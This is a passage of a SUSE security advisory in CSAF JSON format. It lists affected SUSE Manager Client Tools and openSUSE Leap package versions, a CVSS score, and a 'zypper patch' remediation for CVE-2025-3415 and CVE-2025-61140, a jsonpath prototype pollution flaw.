"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "moderate"
}
],
"title": "CVE-2025-3415"
},
{
"cve": "CVE-2025-61140",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61140"
}
],
"notes": [
{
"category": "general",
"text": "The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61140",
"url": "https://www.suse.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "SUSE Bug 1257442 for CVE-2025-61140",
"url": "https://bugzilla.suse.com/1257442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
